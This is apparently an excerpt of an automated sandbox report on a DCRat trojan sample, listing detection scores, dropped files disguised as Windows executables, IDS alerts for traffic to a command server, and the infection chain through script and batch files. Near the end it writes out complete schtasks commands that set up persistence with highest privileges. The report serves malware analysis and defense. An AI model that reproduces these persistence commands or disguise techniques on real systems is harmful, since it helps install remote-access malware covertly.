"searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeReversingLabs: Detection: 81%
            Source: C:\Program Files (x86)\Windows Portable Devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeReversingLabs: Detection: 81%
            Source: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exeReversingLabs: Detection: 81%
            Source: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exeReversingLabs: Detection: 81%
            Source: C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeReversingLabs: Detection: 81%
            Source: C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeReversingLabs: Detection: 81%
            Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 81%
            Source: C:\Recovery\ShellExperienceHost.exeReversingLabs: Detection: 81%
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeReversingLabs: Detection: 81%
            Source: C:\Users\Default\Documents\WmiPrvSE.exeReversingLabs: Detection: 81%
            Source: C:\Users\Public\Desktop\spoolsv.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeReversingLabs: Detection: 81%
            Source: C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeReversingLabs: Detection: 81%
            Source: C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeReversingLabs: Detection: 81%
            Source: C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeReversingLabs: Detection: 81%
            Source: 5U9CuGu1ru.exeReversingLabs: Detection: 63%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Recovery\ShellExperienceHost.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJoe Sandbox ML: detected
            Source: C:\Users\Default\Documents\WmiPrvSE.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJoe Sandbox ML: detected
            Source: C:\Users\Public\Desktop\spoolsv.exeJoe Sandbox ML: detected
            Source: C:\Recovery\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Multimedia Platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exeJoe Sandbox ML: detected
            Source: 5U9CuGu1ru.exeJoe Sandbox ML: detected
            Source: 5U9CuGu1ru.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\1a5d5b8dcee3d8Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows Mail\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows Mail\b7ad5a7a0bb6c8Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\66fc9ff0ee96c2Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows NT\TableTextService\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeDirectory created: C:\Program Files\Windows NT\TableTextService\b7ad5a7a0bb6c8Jump to behavior
            Source: 5U9CuGu1ru.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 5U9CuGu1ru.exe
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: containerdll.exe, 00000006.00000002.2190353169.0000000000B30000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: containerdll.exe, 00000006.00000002.2190353169.0000000000B30000.00000004.08000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0080A5F4
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0081B8E0
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0082AAA8 FindFirstFileExA,0_2_0082AAA8
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49852 -> 141.8.197.42:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49922 -> 141.8.197.42:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49986 -> 141.8.197.42:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49992 -> 141.8.197.42:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49995 -> 141.8.197.42:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49989 -> 141.8.197.42:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49998 -> 141.8.197.42:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:50001 -> 141.8.197.42:80
            Source: containerdll.exe, 00000006.00000002.2190779031.0000000002803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_0080718C
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Windows\Downloaded Program Files\b7ad5a7a0bb6c8Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Windows\Logs\SettingSync\b7ad5a7a0bb6c8Jump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080857B0_2_0080857B
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_008170BF0_2_008170BF
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0082D00E0_2_0082D00E
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080407E0_2_0080407E
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_008311940_2_00831194
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_008032810_2_00803281
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080E2A00_2_0080E2A0
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_008202F60_2_008202F6
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_008166460_2_00816646
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_008137C10_2_008137C1
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_008027E80_2_008027E8
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0082070E0_2_0082070E
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0082473A0_2_0082473A
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080E8A00_2_0080E8A0
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080F9680_2_0080F968
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_008249690_2_00824969
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_00813A3C0_2_00813A3C
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_00816A7B0_2_00816A7B
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_00820B430_2_00820B43
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0082CB600_2_0082CB60
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_00815C770_2_00815C77
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0081FDFA0_2_0081FDFA
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080ED140_2_0080ED14
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_00813D6D0_2_00813D6D
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080BE130_2_0080BE13
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_0080DE6C0_2_0080DE6C
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_00805F3C0_2_00805F3C
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_00820F780_2_00820F78
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeCode function: 6_2_00007FF848F335656_2_00007FF848F33565
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeCode function: 6_2_00007FF848F3C8CD6_2_00007FF848F3C8CD
            Source: C:\Users\Public\Desktop\spoolsv.exeCode function: 18_2_00007FF848F3356518_2_00007FF848F33565
            Source: C:\Users\Public\Desktop\spoolsv.exeCode function: 20_2_00007FF848F2356520_2_00007FF848F23565
            Source: C:\Users\Public\Desktop\spoolsv.exeCode function: 20_2_00007FF848F2CA6D20_2_00007FF848F2CA6D
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeCode function: 22_2_00007FF848F1356522_2_00007FF848F13565
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeCode function: 22_2_00007FF848F1CA5922_2_00007FF848F1CA59
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeCode function: 25_2_00007FF848F3356525_2_00007FF848F33565
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: String function: 0081E28C appears 35 times
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: String function: 0081E360 appears 52 times
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: String function: 0081ED00 appears 31 times
            Source: containerdll.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: WmiPrvSE.exe.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: RuntimeBroker.exe.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: WHqeodkmYpJedFVKZpNEincEtJvAcD.exe0.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: sihost.exe.6.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: 5U9CuGu1ru.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5U9CuGu1ru.exe
            Source: 5U9CuGu1ru.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.evad.winEXE@42/37@0/0
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_00806EC9 GetLastError,FormatMessageW,0_2_00806EC9
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCode function: 0_2_00819E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00819E1C
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeFile created: C:\Users\Public\Desktop\spoolsv.exeJump to behavior
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeMutant created: NULL
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeMutant created: \Sessions\1\BaseNamedObjects\Local\f34332c8b0c24f79d1f4b2e65f8ee056b06f8d1b
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeFile created: C:\Users\user\AppData\Local\Temp\IntodhcpJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" "
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs"
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCommand line argument: sfxname0_2_0081D5D4
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCommand line argument: sfxstime0_2_0081D5D4
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeCommand line argument: STARTDLG0_2_0081D5D4
            Source: 5U9CuGu1ru.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 5U9CuGu1ru.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 5U9CuGu1ru.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeFile read: C:\Users\user\Desktop\5U9CuGu1ru.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\5U9CuGu1ru.exe "C:\Users\user\Desktop\5U9CuGu1ru.exe"
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe"
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe"
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 5 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 10 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /f
